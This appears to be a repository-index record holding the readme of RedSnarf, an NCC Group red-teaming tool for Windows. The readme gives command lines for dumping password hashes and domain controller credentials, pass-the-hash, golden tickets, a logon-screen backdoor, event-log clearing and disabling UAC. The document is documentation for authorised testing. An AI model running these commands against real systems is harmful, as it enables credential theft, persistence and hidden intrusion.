{"id":13843381,"url":"https://github.com/nccgroup/redsnarf","last_synced_at":"2025-05-16T14:05:29.005Z","repository":{"id":41497672,"uuid":"72521497","full_name":"nccgroup/redsnarf","owner":"nccgroup","description":"RedSnarf is a pen-testing / red-teaming tool for Windows environments","archived":false,"fork":false,"pushed_at":"2020-09-14T12:31:11.000Z","size":14251,"stargazers_count":1213,"open_issues_count":5,"forks_count":239,"subscribers_count":80,"default_branch":"master","last_synced_at":"2025-04-19T15:56:36.811Z","etag":null,"topics":["active-directory","pentesting","pentesting-windows","python","windows"],"latest_commit_sha":null,"homepage":"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/november/introducing-redsnarf-and-the-importance-of-being-careful/","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nccgroup.png","metadata":{"files":{"readme":"readme.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2016-11-01T09:21:23.000Z","updated_at":"2025-04-19T02:56:18.000Z","dependencies_parsed_at":"2022-09-05T04:21:22.944Z","dependency_job_id":null,"html_url":"https://github.com/nccgroup/redsnarf","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nccgroup%2Fredsnarf","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nccgroup%2Fredsnarf/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nccgroup%2Fredsnarf/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nccgroup%2Fredsnarf/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nccgroup","download_url":"https://codeload.github.com/nccgroup/redsnarf/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254544146,"owners_count":22088807,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["active-directory","pentesting","pentesting-windows","python","windows"],"created_at":"2024-08-04T17:02:03.904Z","updated_at":"2025-05-16T14:05:23.995Z","avatar_url":"https://github.com/nccgroup.png","language":"PowerShell","funding_links":[],"categories":["Windows Utilities","PowerShell","PowerShell (153)","Tools","Operating Systems"],"sub_categories":["Web Exploitation Books","Windows Utilities","Windows","Penetration Testing Report Templates"],"readme":"```\r\n ______ .____________ _____ \r\n\\______ \\ ____ __| _/ _____/ ____ _____ ________/ ____\\ \r\n | _// __ \\ / __ |\\_____ \\ / \\\\__ \\\\_ __ \\ __\\ \r\n | | \\ ___// /_/ |/ \\ | \\/ __ \\| | \\/| | \r\n |____|_ /\\___ \u003e____ /_______ /___| (____ /__| |__| \r\n \\/ \\/ \\/ \\/ \\/ \\/ \r\n redsnarf.ff0000@gmail.com\r\n @redsnarf\r\n```\r\n\r\n[![GitHub license](https://img.shields.io/hexpm/l/plug.svg)](https://github.com/nccgroup/redsnarf/blob/master/LICENSE.md)\r\n\r\n**RedSnarf** is a pen-testing / red-teaming tool by **Ed Williams** for retrieving hashes and credentials from Windows \r\nworkstations, servers and domain controllers using OpSec Safe Techniques.\r\n\r\nSee our YouTube Channel for Videos\r\nhttps://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ\r\n\r\nRedSnarf functionality includes: \r\n\r\n• Retrieval of local SAM hashes \r\n• Enumeration of user/s running with elevated system privileges and their corresponding lsa secrets password; \r\n• Retrieval of MS cached credentials; \r\n• Pass-the-hash; \r\n• Quickly identify weak and guessable username/password combinations (default of administrator/Password01); \r\n• The ability to retrieve hashes across a range; \r\n• Hash spraying - \r\n Credsfile will accept a mix of pwdump, fgdump and plain text username and password separated by a space; \r\n•\tLsass dump for offline analysis with Mimikatz; \r\n•\tDumping of Domain controller hashes using NTDSUtil and retrieval of NTDS.dit for local parsing; \r\n•\tDumping of Domain controller hashes using the drsuapi method; \r\n•\tRetrieval of Scripts and Policies folder from a Domain controller and parsing for 'password' and 'administrator'; \r\n•\tAbility to decrypt cpassword hashes; \r\n•\tAbility to start a shell on a remote machine; \r\n•\tThe ability to clear the event logs (application, security, setup or system); (Internal Version only) \r\n•\tResults are saved on a per-host basis for analysis. \r\n•\tEnable/Disable RDP on a remote machine. \r\n•\tChange RDP port from 3389 to 443 on a remote machine. \r\n•\tEnable/Disable NLA on a remote machine. \r\n•\tFind where users are logged in on remote machines. \r\n•\tBackdoor Windows Logon Screen \r\n•\tEnable/Disable UAC on a remote machine. \r\n•\tStealth mimikatz added. \r\n•\tParsing of domain hashes \r\n•\tAbility to determine which accounts are enabled/disabled \r\n•\tTake a screen shot of a Remote logged on Active Users Desktop \r\n•\tRecord Remote logged on Active Users Desktop \r\n•\tDecrypt Windows CPassword \r\n•\tDecrypt WinSCP Password \r\n•\tGet User SPN's \r\n•\tRetrieve WIFI passwords from remote machines \r\n\r\nRedSnarf Usage\r\n=======================\r\n\r\n**Requirements:** \r\nImpacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git \r\nCredDump7 - https://github.com/Neohapsis/creddump7 \r\nLsass Retrieval using procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx \r\nNetaddr (0.7.12) - pip install netaddr \r\nTermcolor (1.1.0) - pip install termcolor \r\niconv - used with parsing Mimikatz info locally \r\n\r\n**Show Help** \r\n./redsnarf.py -h \r\n./redsnarf.py --help \r\n\r\nRetrieve Local Hashes\r\n=======================\r\n\r\nRetrieve Local Hashes from a single machine using weak local credentials and clearing the Security event log \r\n**./redsnarf.py -H ip=10.0.0.50 -uC security**\r\n\r\nRetrieve Local Hashes from a single machine using weak local credentials and clearing the application event log \r\n**./redsnarf.py -H ip=10.0.0.50 -uC application**\r\n\r\nRetrieve Local Hashes from a single machine using local administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .**\r\n\r\nRetrieve Local Hashes from a single machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com**\r\n\r\nRetrieve Hashes across a network range using local administrator credentials \r\n**./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .**\r\n\r\nRetrieve Hashes across a network range using domain administrator credentials \r\n**./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com**\r\n\r\nRetrieve Hashes across a network range using domain administrator credentials \r\n**./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com**\r\n\r\nHash Spraying\r\n=======================\r\n\r\nSpray Hashes across a network range \r\n**./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .**\r\n\r\nRetrieve Hashes across a network range domain login \r\n**./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com**\r\n\r\nQuickly Check Credentials \r\n**./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y**\r\n\r\nQuickly Check File containing usernames (-hS) and a generic password (-hP) \r\n**./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y**\r\n\r\nRetrieve Domain Hashes\r\n=======================\r\n\r\nRetrieve Hashes using drsuapi method (Quickest) \r\nThis method supports an optional flag of -q y which will query LDAP and output whether accounts are live or disabled\r\n**./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)**\r\n\r\nRetrieve Hashes using NTDSUtil \r\nThis method supports an optional flag of -q y which will query LDAP and output whether accounts are live or disabled\r\n**./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)**\r\n\r\nGolden Ticket Generation \r\n**./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y**\r\n\r\nInformation Gathering\r\n=======================\r\n\r\nCopy the Policies and Scripts folder from a Domain Controller and parse for password and administrator \r\n**./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y**\r\n\r\nDecrypt Cpassword \r\n**./redsnarf.py -uG cpassword**\r\n\r\nFind User - Live \r\n**/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name**\r\n\r\nFind User - Offline (searches pre downloaded information) \r\n**/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name**\r\n\r\nDisplay NT AUTHORITY\\SYSTEM Tasklist \r\n**/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y** \r\n\r\nScreenshot the Desktop of a Remote Logged on Active User \r\n**/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y** \r\n\r\nMisc\r\n=======================\r\n\r\nStart a Shell on a machine using local administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y**\r\n\r\nStart a Shell on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y**\r\n\r\nRetrieve a copy of lsass for offline parsing with Mimikatz on a machine using local administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y**\r\n\r\nRun stealth mimikatz, this option fires up a web-server to serve a powershell script, this is obfusctaed and encoded machine side, data doesnt touch disk - creds are grepped for in an easy to read style and echoed back to screen. \r\n**./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y**\r\n\r\nRun Custom Command \r\nExample 1 \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'**\r\n\r\nExample 2 - Double Quotes need to be escaped with \\ \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name \\\"domain admins\\\" | dsget group -members -expand'**\r\n\r\nLocal Access Token Policy \r\nCreates a batch file lat.bat which you can copy and paste to the remote machine to execute which will modify the registry and either enable or disable Local Access Token Policy settings. \r\n**./redsnarf.py -rL y**\r\n\r\nWdigest \r\nEnable UseLogonCredential Wdigest registry value on a machine using domain administrator credentials\r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e**\r\n\r\nDisable UseLogonCredential Wdigest registry value on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d**\r\n\r\nQuery UseLogonCredential Wdigest registry value on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q**\r\n\r\nUAC \r\nEnable UAC registry value on a machine using domain administrator credentials\r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e**\r\n\r\nDisable UAC registry value on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d**\r\n\r\nQuery UAC registry value on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q**\r\n\r\nBackdoor - Backdoor Windows Screen - Press Left Shift + Left Alt + Print Screen to activate \r\nEnable Backdoor registry value on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e**\r\n\r\nDisable Backdoor registry value on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d**\r\n\r\nQuery Backdoor registry value on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q**\r\n\r\nAutoLogon \r\nEnable Windows AutoLogon registry value on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA e**\r\n\r\nDisable Windows AutoLogon registry value on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d**\r\n\r\nQuery Windows AutoLogon registry value on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q**\r\n\r\nLock a remote machine user session using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y**\r\n\r\nRDP\r\n=======================\r\n \r\nEnable RDP on a machine using domain administrator credentials\r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e**\r\n\r\nDisable RDP on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d**\r\n\r\nQuery RDP status on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q**\r\n\r\nChange RDP Port from 3389 to 443 - Change RDP Port to 443 on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e**\r\n\r\nChange RDP Port to default of 3389 on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d**\r\n\r\nQuery RDP Port Value on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q**\r\n\r\nEnable Multi-RDP with Mimikatz \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y**\r\n\r\nEnable RDP SingleSessionPerUser on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM e**\r\n\r\nDisable RDP SingleSessionPerUser on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d**\r\n\r\nQuery RDP SingleSessionPerUser status on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q**\r\n\r\nNLA\r\n=======================\r\n\r\nEnable NLA on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e**\r\n\r\nDisable NLA on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d**\r\n\r\nQuery NLA status on a machine using domain administrator credentials \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q**\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnccgroup%2Fredsnarf","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fnccgroup%2Fredsnarf","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnccgroup%2Fredsnarf/lists"}